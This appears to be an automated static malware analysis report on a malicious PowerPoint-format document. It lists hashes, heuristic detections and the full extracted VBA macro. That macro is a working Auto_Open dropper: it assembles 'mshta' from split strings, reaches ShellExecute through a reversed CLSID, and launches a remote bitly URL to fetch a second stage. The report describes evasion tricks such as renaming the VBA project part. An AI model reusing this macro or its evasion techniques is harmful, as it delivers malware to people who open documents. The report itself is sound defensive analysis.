Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d0674af594464452…

MALICIOUS

Office (OOXML)

10.5 KB First seen: 2021-06-17
MD5: 6f1f532e486e5d6683b56e41fb68d983 SHA-1: 129a7e45c9f83f5025c4f9c81a0e534832a4bb7c SHA-256: d0674af594464452612a8433c9147b146df87dc35a3a76ea284a94b11a0fef04
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing obfuscated VBA macros. The Auto_Open macro executes a GetObject call to launch 'mshta' with a URL, which likely downloads and executes a second-stage payload. The URL 'https://www.bitly.com/asiajiwn' is identified as a potential IOC. The VBA code uses string concatenation and obfuscation techniques to hide the malicious intent.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/aw.bin)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    . _
ShellExecute@ _
NamakBora _
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    = _
GetObject _
(StrReverse _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub _
AutO_opEn _
()
  • VBA project is signed but not by a recognised publisher info VBA_SIGNED_UNTRUSTED
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity — malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/asiajiwn In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1268 bytes
SHA-256: 7f7f33e1e6c798664f690e90a7ee9e42cd1a39d1e2764345de8359ba35fa656d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asiajiwn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/aw.bin 19968 bytes
SHA-256: ab7114ce435d9d7adb476173dda619aa5b0268c84d82f73c0f6478689a70d84b
vbaProject_01.bin vba-project OOXML VBA project: ppt/vbaProjectSignature.bin 1928 bytes
SHA-256: c67e15911893e12a2e9d505781a95c9c0bdae898195ee9414d41193be7d10630

Open this report in the interactive analyzer, or submit your own file for analysis.